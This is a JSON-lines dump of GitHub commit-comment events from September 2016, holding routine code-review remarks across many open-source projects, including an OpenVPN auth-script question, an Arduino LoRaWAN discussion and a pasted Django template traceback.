{"id":"4550754748","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18988684,"position":187,"line":228,"path":"src/etc/inc/openvpn.auth-user.php","commit_id":"7b59e10cf871f86cbb1d78175a6c55673c999bc9","created_at":"2016-09-12T17:39:29Z","updated_at":"2016-09-12T17:39:29Z","body":"why is that not required anymore? OpenVPN uses environment variables when using \"auth-user-pass-verify\" or am I missing something?"}},"created_at":"2016-09-12T17:39:29Z"}
{"id":"4550754758","type":"CommitCommentEvent","actor":{"login":"terrillmoore"},"repo":{"name":"things-nyc/arduino-lmic"},"payload":{"comment":{"id":18988683,"position":null,"line":null,"path":null,"commit_id":"6cc4e21bf5e304a40e3a01edd4e4ca751c8f95ea","created_at":"2016-09-12T17:39:29Z","updated_at":"2016-09-12T17:39:29Z","body":"Now that I have a working baseline, that’s the next step. (I will also put in a runtime safety check to make sure the user has configured the otaa/abp material differently than the default – that way people won’t spend hours, as I did, wondering what’s wrong, when it’s just that they forgot to load the proper keys.\n\n \n\nI’d also like to refactor all the common code from the examples so that things that are duplicated in every sketch (like the event print code) are someplace central. I suppose the best thing would be to create another higher-level wrapper library for the Arduino-lmic library – to avoid a commit fight with upstream in case they don’t like it. Opinions are welcome.  I see from online that one library can reference another with the current Arduino env; so maybe we can put the higher-level LoRaWAN helper code in a second library, and leave the primary library more or less as it is. \n\n \n\n--Terry\n\n \n\nFrom: Frank Leon Rose [mailto:notifications@github.com] \nSent: Monday, September 12, 2016 13:24\nTo: things-nyc/arduino-lmic <arduino-lmic@noreply.github.com>\nCc: Terry Moore <tmm@mcci.com>; Mention <mention@noreply.github.com>\nSubject: Re: [things-nyc/arduino-lmic] Added functions to enable/disable/select sub-bands (6cc4e21)\n\n \n\nThat sounds perfect. Agreed on both moving to project_config and supporting 'canned' includes or selectable sets of parameters.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/things-nyc/arduino-lmic/commit/6cc4e21bf5e304a40e3a01edd4e4ca751c8f95ea#commitcomment-18988470> , or mute the thread <https://github.com/notifications/unsubscribe-auth/ASb_72yeoo4AmEonRRyMLNkyWtmUV-ZAks5qpYq3gaJpZM4J6BPh> .\n\n"}},"created_at":"2016-09-12T17:39:29Z"}
{"id":"4550756453","type":"CommitCommentEvent","actor":{"login":"offbored"},"repo":{"name":"scala-lms/tutorials"},"payload":{"comment":{"id":18988691,"position":null,"line":null,"path":null,"commit_id":"5d413de25ab4fc0919c97d7f6ced497597681263","created_at":"2016-09-12T17:39:50Z","updated_at":"2016-09-12T17:39:50Z","body":"Ack--should've kept reading the code. If I'm understanding this correctly, you just use the scala types, bring the IR (and it's types) into scope, and lms(-clean) just lifts the host types into the IR implicitly? That's pretty clever."}},"created_at":"2016-09-12T17:39:50Z"}
{"id":"4550757541","type":"CommitCommentEvent","actor":{"login":"adrilo"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18988693,"position":57,"line":211,"path":"src/Spout/Writer/XLSX/Internal/Worksheet.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-12T17:40:02Z","updated_at":"2016-09-12T17:40:02Z","body":"I guess it depends on the software/version used"}},"created_at":"2016-09-12T17:40:02Z"}
{"id":"4550761545","type":"CommitCommentEvent","actor":{"login":"jrose-apple"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18988705,"position":null,"line":null,"path":null,"commit_id":"34fb15e3754df8d8e6f0d8cfcfda81ae5f86e324","created_at":"2016-09-12T17:40:46Z","updated_at":"2016-09-12T17:40:46Z","body":"It looks like we did indeed remove it. I'm just concerned in general because SE-0054 was not completely implemented at the time, and we still have its vestiges (like the ImplicitlyUnwrappedOptional standard library type)."}},"created_at":"2016-09-12T17:40:46Z"}
{"id":"4550761744","type":"CommitCommentEvent","actor":{"login":"ashercodeorg"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":18988707,"position":4,"line":4,"path":"dashboard/db/migrate/20151118184650_create_authored_hint_view_requests.rb","commit_id":"4c805e84370d2abcac94534cfdda2bab24b80ce7","created_at":"2016-09-12T17:40:49Z","updated_at":"2016-09-12T17:40:49Z","body":"FWIW, there is no need to index on `:user` (it is redundant) with the `[:user_id, :script_id, :level_id, :hint_id]` index below."}},"created_at":"2016-09-12T17:40:49Z"}
{"id":"4550766332","type":"CommitCommentEvent","actor":{"login":"estebanlm"},"repo":{"name":"estebanlm/opensmalltalk-vm"},"payload":{"comment":{"id":18988718,"position":127,"line":3249,"path":"platforms/win32/vm/sqWin32Window.c","commit_id":"e24f4da5a82e2b37a3e3274801ff52b4c5ed0685","created_at":"2016-09-12T17:41:43Z","updated_at":"2016-09-12T17:41:43Z","body":"ok, I will fix in next PR"}},"created_at":"2016-09-12T17:41:43Z"}
{"id":"4550768436","type":"CommitCommentEvent","actor":{"login":"cperciva"},"repo":{"name":"Tarsnap/spiped"},"payload":{"comment":{"id":18988723,"position":null,"line":null,"path":null,"commit_id":"2c943a9da1cccdde3122d9f49e72fa51ab988ffe","created_at":"2016-09-12T17:42:08Z","updated_at":"2016-09-12T17:42:08Z","body":"I generally prefer to keep files readable as plain text when possible; there are exceptions like README.md (because github treats that file as magic) and DESIGN.md (because the formatting was very convenient for making that file more readable) but I don't see any need for BUILDING to use markdown."}},"created_at":"2016-09-12T17:42:08Z"}
{"id":"4550775554","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18988739,"position":187,"line":228,"path":"src/etc/inc/openvpn.auth-user.php","commit_id":"7b59e10cf871f86cbb1d78175a6c55673c999bc9","created_at":"2016-09-12T17:43:24Z","updated_at":"2016-09-12T17:43:24Z","body":"@fabianfrz I think you are :) the only use of this script is the following piece of the code https://github.com/opnsense/core/blob/73f353c9c27e68de57c82593ce633bc3461e39bc/src/sbin/ovpn_auth_verify#L11 which feeds all parameters in its call."}},"created_at":"2016-09-12T17:43:24Z"}
{"id":"4550776976","type":"CommitCommentEvent","actor":{"login":"themightychris"},"repo":{"name":"SlateFoundation/slate-cbl"},"payload":{"comment":{"id":18988742,"position":null,"line":null,"path":null,"commit_id":"5c2dc1e33084ea890ad89f236491d1c4f0c6518d","created_at":"2016-09-12T17:43:40Z","updated_at":"2016-09-12T17:43:40Z","body":"@nbey Ohh I see, that makes sense and explains why the dummy static value for `$browseOrder` is needed. What I was originally puzzled over though was why a __classLoaded override is needed to configure browseOrder with table aliases in the first place? Shouldn`t just setting `public static $browseOrder = ['LENGTH(Code)', 'Code'];` should work AFAIK"}},"created_at":"2016-09-12T17:43:40Z"}
{"id":"4550780480","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988747,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:44:20Z","updated_at":"2016-09-12T17:44:20Z","body":"Weard "}},"created_at":"2016-09-12T17:44:20Z"}
{"id":"4550780663","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":18988748,"position":4,"line":4,"path":"db/migrate/20160912051952_create_routes.rb","commit_id":"4a9d8fb12e4f447e47f6f410793fcb854561a72a","created_at":"2016-09-12T17:44:21Z","updated_at":"2016-09-12T17:44:21Z","body":"Неплохо бы и на уровне базы данных добавить ограничение целостности: `null: false`."}},"created_at":"2016-09-12T17:44:21Z"}
{"id":"4550786465","type":"CommitCommentEvent","actor":{"login":"zhewenw"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":18988759,"position":67,"line":53,"path":"ui/app.jsx","commit_id":"c9be8d8481a246f5d18c281876413d3419eb1983","created_at":"2016-09-12T17:45:24Z","updated_at":"2016-09-12T17:45:24Z","body":"I tried to do this but it gives the following error:\n\nvendor.js:1296 Warning: Unknown prop `props` on <input> tag. Remove this\nprop from the element. For details, see\nᐧ\n\nOn Sat, Sep 10, 2016 at 3:05 PM, Adam Wexler <notifications@github.com>\nwrote:\n\n> Rather than wrapping your attributes onto multiple lines, you can do\n> something like this:\n>\n> function renderInput() {\n>   const props = {\n>     type: 'text',\n>     ref: 'textinput',\n>     placeholder: 'Title Here',\n>     value: this.state.keyword,\n>     onChange: this.handleChange,\n>   };\n> }\n>\n> Then, you can replace this whole element with:\n>\n> {this.renderInput()}\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_zhewenw_react-2Dstarter_commit_c9be8d8481a246f5d18c281876413d3419eb1983-23commitcomment-2D18975173&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=j2Y73wQVk8YtrfCGv2SHWTZ-O3Zmp03s9V_Nt9pgPTA&s=FhiEjSlAzFcBomiSy2cUy-zDEXYd0ouJWmrgX8huWRY&e=>,\n> or mute the thread\n> <https://urldefense.proofpoint.com/v2/url?u=https-3A__github.com_notifications_unsubscribe-2Dauth_AKDN8lyWQsRQMMBQOVkv-2D9wLXtrGdVw2ks5qoymOgaJpZM4J51s4&d=DQMFaQ&c=clK7kQUTWtAVEOVIgvi0NU5BOUHhpN0H8p7CSfnc_gI&r=L_ADWr4Krk3FRtAzAxwK-g&m=j2Y73wQVk8YtrfCGv2SHWTZ-O3Zmp03s9V_Nt9pgPTA&s=YeZ71l5JiCsFG_nTi1UhgZm-VIKO6Duejb-tkO368eI&e=>\n> .\n>\n\n\n\n-- \nSincerely,\n\nJason Wang\n*University of Southern California '17 *\n"}},"created_at":"2016-09-12T17:45:24Z"}
{"id":"4550788366","type":"CommitCommentEvent","actor":{"login":"gabriele-v"},"repo":{"name":"moneymanagerex/moneymanagerex"},"payload":{"comment":{"id":18988767,"position":6,"line":0,"path":"src/model/Model_Attachment.cpp","commit_id":"6edafb7e34287940e215921e4073c25ea854fde9","created_at":"2016-09-12T17:45:44Z","updated_at":"2016-09-12T17:45:44Z","body":"Actually we cannot change it because it's a key in database. \n\nIf you want to change it, you need to create a new DB version with code to update these entries on DB. \nCheck all tables because some of them has been used outside attachments as \"Enum of business entities\": we should move them outside of attachments. "}},"created_at":"2016-09-12T17:45:44Z"}
{"id":"4550793623","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988780,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:46:45Z","updated_at":"2016-09-12T17:46:45Z","body":"ow. i did add \r\nin CreepAction.move:74\r\nif (creep.data.targetId) {\r\n     creep.data.targetId = null;\r\n}"}},"created_at":"2016-09-12T17:46:45Z"}
{"id":"4550796717","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":18988782,"position":68,"line":68,"path":"6/index.html","commit_id":"190a1dc3ac8acfe2f7f4b466d7500de88907eeed","created_at":"2016-09-12T17:47:20Z","updated_at":"2016-09-12T17:47:20Z","body":"для этих ссылок нужно было поставить свойство `display: block`, как бы да, всё окей, однако из-за отсутствия разделения (margin) между ссылками, складывается впечатление, что весь этот блок непрерывная ссылка"}},"created_at":"2016-09-12T17:47:20Z"}
{"id":"4550799089","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/edispatcher"},"payload":{"comment":{"id":18988783,"position":3,"line":3,"path":"app/views/routes/edit.html.erb","commit_id":"4a9d8fb12e4f447e47f6f410793fcb854561a72a","created_at":"2016-09-12T17:47:47Z","updated_at":"2016-09-12T17:47:47Z","body":"Это представление очень похоже на `new.html.erb`. Посмотри как скаффолдинг поступает с фрагментом `_form`. Эта техника пригодится в следующих занятиях."}},"created_at":"2016-09-12T17:47:47Z"}
{"id":"4550801844","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18988787,"position":5,"line":8,"path":"routes/authorize/handlers/changeFaculty.js","commit_id":"d9e46e62da6c2f9190fe3be17a4e5e48806655bf","created_at":"2016-09-12T17:48:19Z","updated_at":"2016-09-12T17:48:19Z","body":"нет проверки на то, что факультет есть в универе"}},"created_at":"2016-09-12T17:48:19Z"}
{"id":"4550802206","type":"CommitCommentEvent","actor":{"login":"radl97"},"repo":{"name":"radl97/js-fractal"},"payload":{"comment":{"id":18988788,"position":52,"line":58,"path":"js/fractal-gui.js","commit_id":"3a5da508097c2f5170eb2df6ed650f8bcf2db0a5","created_at":"2016-09-12T17:48:23Z","updated_at":"2016-09-12T17:48:23Z","body":"?"}},"created_at":"2016-09-12T17:48:23Z"}
{"id":"4550802807","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":18988789,"position":null,"line":null,"path":null,"commit_id":"190a1dc3ac8acfe2f7f4b466d7500de88907eeed","created_at":"2016-09-12T17:48:30Z","updated_at":"2016-09-12T17:48:30Z","body":"картинки \"ужала\" до безумия) не надо так, качество всё-таки должно сохраняться"}},"created_at":"2016-09-12T17:48:30Z"}
{"id":"4550805156","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18988795,"position":6,"line":9,"path":"routes/authorize/handlers/changeYear.js","commit_id":"d9e46e62da6c2f9190fe3be17a4e5e48806655bf","created_at":"2016-09-12T17:48:56Z","updated_at":"2016-09-12T17:48:56Z","body":"Видимо, тут какая-то опечатка"}},"created_at":"2016-09-12T17:48:56Z"}
{"id":"4550806921","type":"CommitCommentEvent","actor":{"login":"lemon-school"},"repo":{"name":"malikova-anastasiia/Lemon-School"},"payload":{"comment":{"id":18988799,"position":null,"line":null,"path":null,"commit_id":"190a1dc3ac8acfe2f7f4b466d7500de88907eeed","created_at":"2016-09-12T17:49:16Z","updated_at":"2016-09-12T17:49:16Z","body":"ну и бэкграунды должны тянуться по всей ширине окна, а контентная часть уже должна иметь фиксированную ширину в 1200px"}},"created_at":"2016-09-12T17:49:16Z"}
{"id":"4550808028","type":"CommitCommentEvent","actor":{"login":"rectaflex"},"repo":{"name":"cwru-pat/HDFIO"},"payload":{"comment":{"id":18988800,"position":null,"line":null,"path":null,"commit_id":"b1663c100da71fe05bddbae3d2f3ad3ef983e357","created_at":"2016-09-12T17:49:28Z","updated_at":"2016-09-12T17:49:28Z","body":" I have commit in forCosmograph branch with a simple test.cpp demonstrates how to use the reading function."}},"created_at":"2016-09-12T17:49:28Z"}
{"id":"4550809113","type":"CommitCommentEvent","actor":{"login":"Slydelix"},"repo":{"name":"MarshRom/android_packages_apps_Settings"},"payload":{"comment":{"id":18988801,"position":null,"line":null,"path":null,"commit_id":"3403458231b44109d9f065de2327916e3ba2d577","created_at":"2016-09-12T17:49:39Z","updated_at":"2016-09-12T17:49:39Z","body":"this switch works like a charm :)"}},"created_at":"2016-09-12T17:49:39Z"}
{"id":"4550810212","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18988804,"position":13,"line":10,"path":"routes/documents/handlers/addComment.js","commit_id":"d9e46e62da6c2f9190fe3be17a4e5e48806655bf","created_at":"2016-09-12T17:49:51Z","updated_at":"2016-09-12T17:49:51Z","body":"не надо пользоваться таким способом. Лучше пользоваться UAMS.getUserById, все методы модели вынесены как публичные в сам UAMS"}},"created_at":"2016-09-12T17:49:51Z"}
{"id":"4550815789","type":"CommitCommentEvent","actor":{"login":"werty100"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18988818,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-12T17:50:54Z","updated_at":"2016-09-12T17:50:54Z","body":"@sndnvaps  you need  to used LD_PRELOAD\r\nafter that logcat also need to remove dhcp stuff that is not longer uses and legacy paths also."}},"created_at":"2016-09-12T17:50:54Z"}
{"id":"4550820614","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18988824,"position":null,"line":null,"path":null,"commit_id":"42f2b3525cc2ce810d17b9c258370ec5933838b6","created_at":"2016-09-12T17:51:47Z","updated_at":"2016-09-12T17:51:47Z","body":"The page https://community.trinitycore.org/forum/13-wdbadbsniffs/ itself is readable, but the posts themselves are not readable by users after posting. I tried reading your post, I get \"You do not have permission to view this content.\" which is correct. (Yes, I was logged in when I tested.) Not sure exactly why the older posts are hidden, maybe yours will be hidden later after one of the maintainers has looked at your post and processed it."}},"created_at":"2016-09-12T17:51:47Z"}
{"id":"4550824427","type":"CommitCommentEvent","actor":{"login":"shivangpatel"},"repo":{"name":"stephenmcd/mezzanine"},"payload":{"comment":{"id":18988831,"position":null,"line":null,"path":null,"commit_id":"533d04f07b1f791de09590a845428f9af5be5806","created_at":"2016-09-12T17:52:26Z","updated_at":"2016-09-12T17:52:26Z","body":"I got new error for rendering template... \r\n\r\n**VariableDoesNotExist at /admin/forms/form/3/entries/**\r\n\r\n`Failed lookup for key [settings] in u\"[{'False': False, 'None': None, 'True': True}, {u'title': <django.utils.functional.__proxy__ object at 0x7f53fe9df750>, u'entries_form': <EntriesForm bound=False, valid=Unknown, fields=(field_1_export;field_1_filter;field_1_contains;field_2_export;field_2_filter;field_2_contains;field_3_export;field_3_filter;field_3_contains;field_4_export;field_4_filter;field_4_contains;field_0_export;field_0_filter;field_0_from;field_0_to)>, u'submitted': False, u'original': <Form: About us / Contact>, u'opts': <Options for Form>, u'can_delete_entries': True}]\"`\r\n\r\n`Environment:\r\n\r\n\r\nRequest Method: GET\r\nRequest URL: http://127.0.0.1:8000/admin/forms/form/3/entries/\r\n\r\nDjango Version: 1.10.1\r\nPython Version: 2.7.12\r\nInstalled Applications:\r\n(u'mezzanine.boot',\r\n u'django.contrib.auth',\r\n u'django.contrib.contenttypes',\r\n u'django.contrib.redirects',\r\n u'django.contrib.sessions',\r\n u'django.contrib.sites',\r\n u'django.contrib.sitemaps',\r\n u'mezzanine.conf',\r\n u'mezzanine.core',\r\n u'mezzanine.generic',\r\n u'mezzanine.pages',\r\n u'mezzanine.blog',\r\n u'mezzanine.forms',\r\n u'mezzanine.galleries',\r\n u'mezzanine.twitter',\r\n u'contact_form_bootstrap',\r\n u'filebrowser_safe',\r\n u'grappelli_safe',\r\n u'django.contrib.admin',\r\n u'django.contrib.staticfiles',\r\n u'django_comments')\r\nInstalled Middleware:\r\n(u'django.contrib.sessions.middleware.SessionMiddleware',\r\n u'django.middleware.common.CommonMiddleware',\r\n u'django.middleware.csrf.CsrfViewMiddleware',\r\n u'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n u'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\r\n u'django.contrib.messages.middleware.MessageMiddleware',\r\n u'django.middleware.clickjacking.XFrameOptionsMiddleware',\r\n u'mezzanine.core.request.CurrentRequestMiddleware',\r\n u'mezzanine.core.middleware.RedirectFallbackMiddleware',\r\n u'mezzanine.core.middleware.TemplateForDeviceMiddleware',\r\n u'mezzanine.core.middleware.TemplateForHostMiddleware',\r\n u'mezzanine.core.middleware.AdminLoginInterfaceSelectorMiddleware',\r\n u'mezzanine.core.middleware.SitePermissionMiddleware',\r\n u'mezzanine.pages.middleware.PageMiddleware')\r\n\r\n\r\nTemplate error:\r\nIn template /usr/local/lib/python2.7/dist-packages/mezzanine/forms/templates/admin/forms/entries.html, error at line 0\r\n   (Could not get exception message)   1 : {% extends \"admin/base_site.html\" %}\r\n   2 : \r\n   3 : {% load i18n staticfiles %}\r\n   4 : \r\n   5 : {% block extrahead %}\r\n   6 : {{ block.super }}\r\n   7 : <link rel=\"stylesheet\" href=\"{% static \"mezzanine/css/admin/form_entries.css\" %}\">\r\n   8 : <script src=\"{% static \"mezzanine/js/admin/form_entries.js\" %}\"></script>\r\n   9 : {% endblock %}\r\n   10 : \r\n\r\n\r\nTraceback:\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/core/handlers/exception.py\" in inner\r\n  39.             response = get_response(request)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py\" in _legacy_get_response\r\n  249.             response = self._get_response(request)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py\" in _get_response\r\n  187.                 response = self.process_exception_by_middleware(e, request)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/core/handlers/base.py\" in _get_response\r\n  185.                 response = wrapped_callback(request, *callback_args, **callback_kwargs)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/utils/decorators.py\" in _wrapped_view\r\n  149.                     response = view_func(request, *args, **kwargs)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/views/decorators/cache.py\" in _wrapped_view_func\r\n  57.         response = view_func(request, *args, **kwargs)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/contrib/admin/sites.py\" in inner\r\n  211.             return view(request, *args, **kwargs)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/mezzanine/forms/admin.py\" in entries_view\r\n  137.         return render_to_response(template, context, RequestContext(request))\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/shortcuts.py\" in render_to_response\r\n  21.     content = loader.render_to_string(template_name, context, using=using)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/loader.py\" in render_to_string\r\n  68.     return template.render(context, request)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/backends/django.py\" in render\r\n  66.             return self.template.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render\r\n  208.                     return self._render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in _render\r\n  199.         return self.nodelist.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render\r\n  994.                 bit = node.render_annotated(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render_annotated\r\n  961.             return self.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/loader_tags.py\" in render\r\n  174.         return compiled_parent._render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in _render\r\n  199.         return self.nodelist.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render\r\n  994.                 bit = node.render_annotated(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render_annotated\r\n  961.             return self.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/loader_tags.py\" in render\r\n  174.         return compiled_parent._render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in _render\r\n  199.         return self.nodelist.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render\r\n  994.                 bit = node.render_annotated(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render_annotated\r\n  961.             return self.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/loader_tags.py\" in render\r\n  70.                 result = block.nodelist.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render\r\n  994.                 bit = node.render_annotated(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in render_annotated\r\n  961.             return self.render(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/templatetags/static.py\" in render\r\n  104.         url = self.url(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/templatetags/static.py\" in url\r\n  100.         path = self.path.resolve(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in resolve\r\n  733.                     arg_vals.append(arg.resolve(context))\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in resolve\r\n  852.             value = self._resolve_lookup(context)\r\n\r\nFile \"/usr/local/lib/python2.7/dist-packages/django/template/base.py\" in _resolve_lookup\r\n  907.                                                        (bit, current))  # missing attribute\r\n\r\nException Type: VariableDoesNotExist at /admin/forms/form/3/entries/\r\nException Value: Failed lookup for key [settings] in u\"[{'False': False, 'None': None, 'True': True}, {u'title': <django.utils.functional.__proxy__ object at 0x7f53fe9df750>, u'entries_form': <EntriesForm bound=False, valid=Unknown, fields=(field_1_export;field_1_filter;field_1_contains;field_2_export;field_2_filter;field_2_contains;field_3_export;field_3_filter;field_3_contains;field_4_export;field_4_filter;field_4_contains;field_0_export;field_0_filter;field_0_from;field_0_to)>, u'submitted': False, u'original': <Form: About us / Contact>, u'opts': <Options for Form>, u'can_delete_entries': True}]\"\r\n`"}},"created_at":"2016-09-12T17:52:26Z"}
{"id":"4550831925","type":"CommitCommentEvent","actor":{"login":"TomasMikula"},"repo":{"name":"non/kind-projector"},"payload":{"comment":{"id":18988843,"position":163,"line":385,"path":"README.md","commit_id":"6cd9f1b4969b2b43b1eb64741a2df583bff7a17c","created_at":"2016-09-12T17:53:48Z","updated_at":"2016-09-12T17:53:48Z","body":"Should be `type` instead of `trait`.\r\n\r\n```scala\r\ntype Id[A] = A\r\n```"}},"created_at":"2016-09-12T17:53:48Z"}
{"id":"4550834539","type":"CommitCommentEvent","actor":{"login":"AaronP1986"},"repo":{"name":"AaronP1986/aaronp1986.github.io"},"payload":{"comment":{"id":18988851,"position":29,"line":22,"path":"index.html","commit_id":"d2c56afab74d61fc56d228bc56f7745cd0a1d05a","created_at":"2016-09-12T17:54:17Z","updated_at":"2016-09-12T17:54:17Z","body":"[(www.aaronp1986.github.io/DefaultMap)]"}},"created_at":"2016-09-12T17:54:17Z"}
{"id":"4550838935","type":"CommitCommentEvent","actor":{"login":"marcotuts"},"repo":{"name":"edx/edx-platform"},"payload":{"comment":{"id":18988867,"position":null,"line":null,"path":null,"commit_id":"939a3672d4c2f65a6c8d04ebe7cacb621d8a1485","created_at":"2016-09-12T17:55:04Z","updated_at":"2016-09-12T17:55:04Z","body":"Thanks for the note. I actually will need to defer to @griffresch or another product manager on this one, I'm not sure what change added the \"Course is New\" setting so I can't confirm expected behavior here. Griff are you the right person to review or should we tag someone who recently worked on the catalog in commerce? "}},"created_at":"2016-09-12T17:55:04Z"}
{"id":"4550840573","type":"CommitCommentEvent","actor":{"login":"non"},"repo":{"name":"non/kind-projector"},"payload":{"comment":{"id":18988870,"position":163,"line":385,"path":"README.md","commit_id":"6cd9f1b4969b2b43b1eb64741a2df583bff7a17c","created_at":"2016-09-12T17:55:21Z","updated_at":"2016-09-12T17:55:21Z","body":"Yes! Good catch, thanks."}},"created_at":"2016-09-12T17:55:21Z"}
{"id":"4550840682","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":18988871,"position":null,"line":null,"path":null,"commit_id":"e45800f5ab637a1f33bd3f21187e96edf61bd9d9","created_at":"2016-09-12T17:55:22Z","updated_at":"2016-09-12T17:55:22Z","body":"i can do PR with my version if you like give it try"}},"created_at":"2016-09-12T17:55:22Z"}
{"id":"4550849982","type":"CommitCommentEvent","actor":{"login":"n3wt0nSAN"},"repo":{"name":"INNoWay/EditorMm"},"payload":{"comment":{"id":18988898,"position":4,"line":5,"path":"EditorMm/index.html","commit_id":"fc68ba6ba111045e4eff2e86df99b2c77684fa47","created_at":"2016-09-12T17:56:56Z","updated_at":"2016-09-12T17:56:56Z","body":"Samuel, deixe essa tag '<meta ... >' pois a codificação utf-8 não está sendo reconhecida no editor que uso, por isso acrescentei ela."}},"created_at":"2016-09-12T17:56:56Z"}
{"id":"4550852080","type":"CommitCommentEvent","actor":{"login":"ktbyers"},"repo":{"name":"napalm-automation/napalm-ios"},"payload":{"comment":{"id":18988904,"position":13,"line":14,"path":"setup.py","commit_id":"993d0d7d10401d204efe3c24ff0236421e506af3","created_at":"2016-09-12T17:57:18Z","updated_at":"2016-09-12T17:57:18Z","body":"Yes, would be good to have this in napalm-base so that we don't have to duplicate it everywhere."}},"created_at":"2016-09-12T17:57:18Z"}
{"id":"4550859220","type":"CommitCommentEvent","actor":{"login":"apexearth"},"repo":{"name":"lebabjs/lebab"},"payload":{"comment":{"id":18988917,"position":null,"line":null,"path":null,"commit_id":"60647bd90a7e67cd910a09bcc28265d159ee9019","created_at":"2016-09-12T17:58:30Z","updated_at":"2016-09-12T17:58:30Z","body":"I was thinking the same thing about adding a PotentialConstructor class. :)"}},"created_at":"2016-09-12T17:58:30Z"}
{"id":"4550867299","type":"CommitCommentEvent","actor":{"login":"chenx97"},"repo":{"name":"Toufukun/GiriGiriPlayer"},"payload":{"comment":{"id":18988934,"position":null,"line":null,"path":null,"commit_id":"01958c13f32fb62524a32e2e9411b4190e0c1a73","created_at":"2016-09-12T17:59:56Z","updated_at":"2016-09-12T17:59:56Z","body":"U just spelled mobile as \"moblie\""}},"created_at":"2016-09-12T17:59:56Z"}
